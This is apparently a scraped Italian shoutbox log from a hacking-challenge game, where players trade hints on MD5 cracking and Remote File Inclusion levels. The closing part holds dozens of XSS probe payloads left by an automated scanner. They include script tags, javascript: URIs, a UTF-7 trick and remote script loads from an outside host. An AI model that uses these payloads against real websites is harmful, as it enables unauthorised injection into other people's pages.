<lordofchaos> hail
<EgiX> Level 4
<LordGroove> Level 10
<N0R81X> aggiunto uno script che visualizza le statistiche sui browser usati dagli users!
<gianluca> ciao ciao
<k8> da dove inizia il gioco? rotfll
<LordGroove> Il gioco inizia cliccando semplicemente su Inizia la Sfida !
<k8> quindi devo sgamare la password, e l'user?
<N0R81X> sisi, aiutino? guarda il sorgente!
<EgiX> ehi! sono arrivato al livello 4, ma lo script per salvare la mia posizione non funziona!
<N0R81X> in che senso la tua posizione? spiegati meglio!
<upd> qualcuno può dirmi qualcosa in più sul secondo livello? bisogna andare per tentativi o bisogna fare qualcos'altro dopo quello che c'è scritto sul commento
<LordGroove> informati sul Remote File Inclusion...comunque per il supporto completo siamo su http://securitybox.altervista.org/forum/ precisamente nella sezione Hacker-Game
<N0R81X> non si va mai avanti per tentativi, bisogna sempre cercare e usare la testa
<Test> Ma nel primo lv bisogna crackare l'md5 o c'è qualche bug di cui non mi sono reso conto?
<N0R81X> devi crackare l'md5
<HaFiPz> Livello 4
<EgiX> nel senso che ogni volta che rientro mi fa iniziare dal livello 1, e non funzia nemmeno la classifica
<HaFiPz> Livello 5
<N0R81X> la classifica è manuale, siccome non avete un account per entrare, come detto in home, dovete usare il form per entrarci. riguardo al programma, non è detto che dovete per forza avviarlo! e riguardo al salvataggio dello stato, non ci sono cookie che memorizzano la vostra posizione, semplicemente copiate e incollate l'url! ho messo le variabili di tipo GET proprio per questo
<HaFiPz> Risposta agli sviluppatori del prog del liv5: Complimenti a voi per averla nascosta tanto bene eheh
<HaFiPz> Livello 6
<HaFiPz> Livello 7
<HaFiPz> Livello 8 :D
<EgiX> Solo 1 persone sono arrivate alla fine come hai fatto tu! ...e quindi adesso devo mandare tutti gli username/password tramite il form?
<HaFiPz> Ultimo livello,aleeeeeeeeeeeee
<EgiX> Fatto! aspetto di vedermi primo in classifica :-p
<Philty> Raga sto al livello 2,ho capito cosa vuol dire l'immagine e cosa devo fare...ma su cosa la applico?
<N0R81X> semplice, guarda il sorgente!
<N0R81X> ok simpaticoni, classifica aggiornata, magari sarà da sistemare lo script quando mi inviano i risultati gli altri utenti, ciauuuuuuuu
<HaFiPz> Ed ecco a voi,signori e signore,il secondo vincitore dell'hackme-game offerto da SecurityBOX ..... (Rullo di tamburi) ..... Me ! xD
<N0R81X> ASD ma che simpaticone! comunque classifica aggiornata, 2 vincitori per ora..... o_O
<Crazyhack93> hey boys... nice site...
<LordGroove> Crazyhack93, thanks a lot ;)
<N0R81X> hei quella era per me! Lot Of Laughs
<`RubRumDr4g0n`> lol
<nick?> Aiutino sul liv 5?
<N0R81X> si, scarica l'eseguibile...
<nick?> e poi??? lo apro dice troppo grande...devo fare hex editing?
<N0R81X> basta anche un semplice editor, come notepad.exe o pico
<necrosis> ma dove si accede all' hackergame?
<nick?> Emh...ma a me il programma da errore "Programma troppo grande perla memoria" è normale?
<nick?> lo avete corrotto voi?
<N0R81X> il programma lo devi aprire col notepad.exe o col wordpad.exe, se invece stai su linux prova pico o kwrite
<N0R81X> weee necrosis, vedi quel testo che scorre al centro, in verde perchè salta subito all'occhio? c'è scritto "Inizia la sfida", devi cliccare li
<nick?> Mi potete dire di quanti caratteri è la pass non criptata ? :D contando anche le cifre gia "immesse"
<s1m0n3_1992> salve ^^
<aFCOBRA> fico xD
<Scr34M> Ciao a tutti inizio anche io l'hack game
<Red Skull 92> Ma come si supera il 2 livello ? devo salvare l'immagine e vedrne il sorgente?Per trovare la pass e l'user? Ma non trovo niente.
<N0R81X> no, l'immagine ha una scritta, devi leggerla, oltre a questo non posso dirti nulla. PS: non spammare
<Ichi> Cià.
<LordGroove> Ciao ai nuovi arrivati ! Divertitevi con questi Test !
<Anarhia> ho provato anChe io a fare questo test, ma non sono arrivato al secondo livello XD, non mi viene in mente niente, da quanto ho capito devo cercare l'user e la pass nel sorgente della pagina, ma non trovo niente, non avete niente per i dilettanti??? XD
<Anarhia> è possibile che nel forum ci sia scritto qualche modo per trovare la pass?
<N0R81X> Anarhia mi sono permesso di correggere gli errori grammaticali nei tuoi messaggi XD, comunque nel sorgente della pagina nel primo livello c'è uno strano commento.....
<N0R81X> riguardo ai test per dilettanti... tutte e 3 le persone che sono arrivate alla fine si sono lamentate che era tutto troppo facile hahahhahahahaha..... ^^'
<Anarhia> ma daii... hai coretto la "kappa" ;-D
<Anarhia> per quelli Che si sono lamentati che il test è stato troppo facile cosa posso dire, saranno dei cloni di Mitnick ^_^
<N0R81X> ASD ^^', comunque hai superato il primo? dai è facile!
<Anarhia> no guarda sono stato li mezz'ora a guardare quei due commenti ma nn mi viene in mente niente... :-(
<N0R81X> "<!-- level1 - PHP source: lev1.txt -->", hai provato a scaricare lev1.txt?
<M4R$> mi sono bloccato al livello 2 ho capito il significato dell'immagine ma nn trovo nulla aiutino please!?
<N0R81X> un tizio proprio qui ha fatto la tua stessa domanda..... prova ad alzare un po lo sguardo...
<M4R$> Si ho letto, :) e mi so fatto una cultura esagerata sul nome dell'immagini capisci cosa intendo ma nn riesco a varcare quella soglia.. help me
<N0R81X> l'immagine non la devi ne scaricare, ne aprire con qualche editor... guarda solo l'acronimo di "Reti Ferroviarie Italiane"
<M4R$> "frase senza senso eliminata, prego ritentare"
<ProGM> Level 10... però che palle, non ho voglia di scrivermi un decrittatore di vigenère :\
<N0R81X> scusa M4R$ ma non pensi che dovresti essere più serio? hai inviato 3 volte lo stesso messaggio sbagliando pure a scrivere. impara le buone regole che dovrebbero essere rispettate in ogni sito e su cui gli admin non mollano mai per tenere l'ordine
<N0R81X> ProGM non devi scriverlo, devi usare quello di norbix.altervista.org, bye! ^^'
<M4R$> Credimi nn è colpa mia aggiornando la pagina sono venute fuori 3 righe mi dispiace chiedo scusa....
<N0R81X> ok scusato XD
<themodder> manco il primo livello riuscite a superare -.-
<jimbo> iniziamo
<N0R81X> mazza che spammata mi sono trovato di fronte ^^'
<ADK> What is this :D speak english !
<N0R81X> why? we r in italy...
<onezell> io sono bloccato al lvl2.. ke file devo usare..?
<N0R81X> guarda su wikipedia o cerca su google informazioni su quella vulnerabilità, è una delle più diffuse al momento
<securitybox> hackingtest
<N0R81X> complimenti hai vinto un continente! ma le scritte gialle non le leggete o avete dimenticato da qualche parte gli occhiali da vista?
<bld87> ma nel primo livello c'è qualcosa da tradurre in hex? non ci sto capendo nulla....sono proprio una pippa! :(
<N0R81X> primo livello md5 mi sembra, non lo ricordo più XD
<dominatorxx> raga provo a fa sto gioco...vediamo a che lv arrivo
<domiantorxx> ma che cavolo a me nn da nessun codice da decriptare...come faccio
<ProGM> ... finito °°
<Hero> Ciao
<N0R81X> we ciao, come butta? asd
<Born_006> Il Mio Nome lo vedrete in molti posti in FUTURO non vi dimentate mai di me...
<giupi91> AIUTO! sono al 2
<430n> ciao a tutti, bello questo sito!
<430n> level 2... Blocked.. non so usare l'exploit probabilmente, :(
<Cr0W> un saluto a tutti in particolare a lordgroove
<N0R81X> ma non usate inutili script trovati chissà dove, imparate ad usare la testa! "secondo me è la mente l'arma migliore" - john rambo
<Black:Underground> Ma cm si supera il primo livello.... Ho trovato la stringa che dice dell'md5 ma poi??? Help! Ke pippa ke sono!
<djm> come si ricava user e password da un immagine delle ferrovie dello stato?rfi non mi dice niente
<djm> come si ricava user e password da un immagine delle ferrovie dello stato?rfi non mi dice niente
<devil-dev> ciao
<Cì> Ma davvero così scandaloso sono...aiutino x passare il primo livello?
<Franci> aiuto..neanche il primo livello so passare!
<casper> ciao
<kokko> help!!
<attakkante> aiutino sul livello 3?
<WrAnGLeR> ciao raga... il primo è semplicissimo... tanto stamattina non ho nulla da fare al lavoro .... continuo col 2°
<gabri> come si supera il 1° livello
<vanish> Raga anche se clicco su inizia sfida nn mi fa partire
<killer957> sono bloccato al 2 |: su che bug uso il remote file inclusion?
<Altair> Ma dai ... nel secondo livello l'rfi non te lo fa fare davvero .... "supponiamo" mi dice :-P
<Altair> LIV 5 : Ma andate a c...e!!!! e io che mi sbattevo a tentare di decompilarlo!!!!!
<Altair> Lol, sono all livello 9 :-)
<Altair> alsias Andreabont :-) Sto affrontando il 10 :-P sono determinato e ce la farò :-) lol
<killer957> boh sono fermo .-. supponiamo di fare l'rfi non so che dire |:
<Andreabont> ALIAS altair --> HO FINITOOOOOOOOOOOOOOOOOOOOOOOOOOOOO MA VAIIIIIIIIIIIIII!!!!!!!!!! VITTORRRIAAA!!!! :-)
<N0R81X> mazza quanto odio gli spammers... ^^'
<N0R81X> a proposito, vi piace questo giochetto oppure no? come è venuto? sono stato bravo? rispondete, passo!
<Andreabont> MALOL! Non puoi reprimere così la mia felicità!! :-))... Skerzi a parte... Il gioko è fatto bene i miei complimenti... acnhe se personalmente speravo di poter usare veramente una shell :-D
<LordGroove> Ahahahah Andreabont :) una shelll vera per ora è difficile da inserire :D
<Iguana> sono al livello 2...bella sta sfida
<Profanatore> Complimenti Ottimo web
<N0R81X> ma ottimo cosa, stavo per scrivere "grazie", sei profanatore, il sommo programmatore dell'hacker game che come ulimo livello tenta di invogliarti a scaricare un virus!?
<MDL16> cosa è starobba???
<IO> quali azioni si devono fare per finire il primo livello???
<Andreabont> lol, il gioco continua a mietere vittime??? hehehee :-)
<N0R81X> mi fa piacere che vi troviate bene con il gioco, sono davvero contento, grazie a tutti voi!
<Andreabont> Noooooooorbixxxxxxxxxxxx!!!! Perckè mi hai spostato al sesto posto della classifica??? Ero al quinto prima!!!!!!!
<alias> ciao a tutti
<Elvis> Ciao a tutti! Ma per giocare si deve essere registrati?
<Harley> Suggerimenti per il livello 4? grazie :)
<Andreabont> Non bisogna registrarsi.. il gioco è appunto quello di travare user e password violando le protezioni :-) loool
<Andy> ciao
<acesapce90> oooooooooo ma come si gioca
<djrich> come si va avanti??
<KriS-CyniclY-DiassembleD> ciao a tutti!!!aiutino sul 4 livello??non ho proprio capito che devo fare....
<Shotokan> Gran Bel sito, complimenti!
<hackerone> ciao io sono hacker hacker hacker hacker hacker e mi piace farlo
<Shotokan> Livello 6 :P
<Shotokan> Livello 10! :P
<:)> ciao come va? che sito uin po antico vi voglio bene <B ";)
<dfs> fvbhb
<markdam> livello1
<DFGDFGD> DFGDFGDFGDFGD
<SADASD> CIAO
<ciao> mbà
<action> Send
<user> pass
<antonio> pieeeeeeeeeeeeeeeero
<Sc0rp10n> scusate ma come sarebbe a dire che al livello 2 l'RFI non va fatto sul serio??? o si fa o non si fa.. che devo da fa??? :D
<ghostnet> hahaha
<<script>alert(39649,4594279861)</script>> 111-222-1933email@address.com
<<ScRiPt >
<>alert(39650,4594279861);</ScRiPt>> 111-222-1933email@address.com
<>'><ScRiPt >
<>alert(39651,4594279861);</ScRiPt>> 111-222-1933email@address.com
<>"><ScRiPt >
<>alert(39652,4594279861);</ScRiPt>> 111-222-1933email@address.com
<</textarea><ScRiPt >
<>alert(39653,4594279861);</ScRiPt>> 111-222-1933email@address.com
<</title><ScRiPt >
<>alert(39654,4594279861);</ScRiPt>> 111-222-1933email@address.com
<--><ScRiPt >
<>alert(39655,4594279861);</ScRiPt>> 111-222-1933email@address.com
<email@some<ScRiPt >
<>alert(39656,4594281597);</ScRiPt>domain.com> 111-222-1933email@address.com
<[img]JaVaScRiPt:alert(39657,4594281597);[/img]> 111-222-1933email@address.com
<<img src="JaVaScRiPt:alert(39658,4594281597);">> 111-222-1933email@address.com
<111-222-1933email@address.com> <script>alert(39659,4594281597)</script>
<111-222-1933email@address.com> <ScRiPt
<>alert(39660,4594283449);</ScRiPt>> 03/07/2008
<111-222-1933email@address.com> >'><ScRiPt
<>alert(39661,4594283449);</ScRiPt>> 03/07/2008
<111-222-1933email@address.com> >"><ScRiPt
<>alert(39662,4594283449);</ScRiPt>> 03/07/2008
<111-222-1933email@address.com> </textarea><ScRiPt
<>alert(39663,4594283449);</ScRiPt>> 03/07/2008
<111-222-1933email@address.com> </title><ScRiPt
<>alert(39664,4594283449);</ScRiPt>> 03/07/2008
<111-222-1933email@address.com> --><ScRiPt
<>alert(39665,4594283449);</ScRiPt>> 03/07/2008
<111-222-1933email@address.com> email@some<ScRiPt
<>alert(39666,4594283449);</ScRiPt>domain.com> 03/07/2008
<111-222-1933email@address.com> [img]JaVaScRiPt:alert(39667,4594283449);[/img]
<111-222-1933email@address.com> <img src="JaVaScRiPt:alert(39668,4594283449);">
<<>
<<scrip<script>t>alert(39680,4594652315);</scrip</script>t>> 111-222-1933email@address.com
<<DIV STYLE="width:expression(alert(39681,4594652315));">> 111-222-1933email@address.com
<<FRAMESET><FRAME SRC="JaVaScRiPt:alert(39682,4594652315);"></FRAMESET>> 111-222-1933email@address.com
<<img dynsrc="JaVaScRiPt:alert(39683,4594652315);">> 111-222-1933email@address.com
<<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(39684,4594652315);">> 111-222-1933email@address.com
<<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="39685,4594652315">> 111-222-1933email@address.com
<<embed src="http://testphp.acunetix.com/xss.swf?39686,4594652315" type="application/x-shockwave-flash"/>> 111-222-1933email@address.com
<<body onload=alert(39687,4594652315)>> 111-222-1933email@address.com
<<ScRiPt src=http://testphp.acunetix.com/xss.js?39688,4594652315></ScRiPt>> 111-222-1933email@address.com
<111-222-1933email@address.com> <
<111-222-1933email@address.com> <scrip<script>t>alert(39690,4595044792);</scrip</script>t>
<111-222-1933email@address.com> <DIV STYLE="width:expression(alert(39691,4595044792));">
<111-222-1933email@address.com> <FRAMESET><FRAME SRC="JaVaScRiPt:alert(39692,4595044792);"></FRAMESET>
<111-222-1933email@address.com> <img dynsrc="JaVaScRiPt:alert(39693,4595044792);">
<111-222-1933email@address.com> <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(39694,4595044792);">
<111-222-1933email@address.com> <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="39695,4595044792">
<111-222-1933email@address.com> <embed src="http://testphp.acunetix.com/xss.swf?39696,4595044792" type="application/x-shockwave-flash"/>
<111-222-1933email@address.com> <body onload=alert(39697,4595044792)>
<111-222-1933email@address.com> <ScRiPt src=http://testphp.acunetix.com/xss.js?39698,4595044792></ScRiPt>
<<script/xss src=http://testphp.acunetix.com/xss.js?39709,4595762731></script>> 111-222-1933email@address.com
<<img src=http://testphp.acunetix.com/dot.gif onload=alert(39710,4595762731)>> 111-222-1933email@address.com
<' style='background:url(JaVaScRiPt:alert(39711,4595762731))' invalidparam='> 111-222-1933email@address.com
<%3CScRiPt%3Ealert(39712,4595762731);%3C/ScRiPt%3E> 111-222-1933email@address.com
<<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?39713,4595762731"></ScRiPt>> 111-222-1933email@address.com
<" onmouseover=alert(39714,4595762731) > 111-222-1933email@address.com
<</div><ScRiPt >
<>alert(39715,4595762731);</ScRiPt>> 111-222-1933email@address.com
<<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(39716,4595762731)+ADsAPA-/ScRiPt+AD4-> 111-222-1933email@address.com
|
|